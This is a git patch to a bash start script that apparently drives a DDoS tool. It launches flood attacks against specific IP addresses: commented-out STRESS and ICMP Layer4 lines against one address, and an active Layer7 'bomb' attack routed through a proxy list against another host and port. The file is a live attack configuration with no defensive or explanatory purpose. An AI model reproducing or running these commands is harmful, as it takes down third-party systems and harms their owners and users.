From 3ec5ae2c6f3502a39cbeece9b89baa1e30892770 Mon Sep 17 00:00:00 2001 From: partizan59rus Date: Fri, 18 Aug 2023 18:55:02 +0000 Subject: [PATCH] =?UTF-8?q?=D0=9E=D0=B1=D0=BD=D0=BE=D0=B2=D0=B8=D1=82?= =?UTF-8?q?=D1=8C=20start.sh?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- start.sh | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/start.sh b/start.sh index 3c53446..35a3ac3 100644 --- a/start.sh +++ b/start.sh @@ -1,3 +1,8 @@ #!/bin/bash cd /root/MH* -#python3 start.py STRESS 188.43.238.65 50 60 true \ No newline at end of file +#Layer4 +#python3 start.py ICMP 188.43.238.65 50 60 true + + +#Layer7 +python3 start.py bomb 80.249.131.87:20000 0 50 proxy.txt 100 60 \ No newline at end of file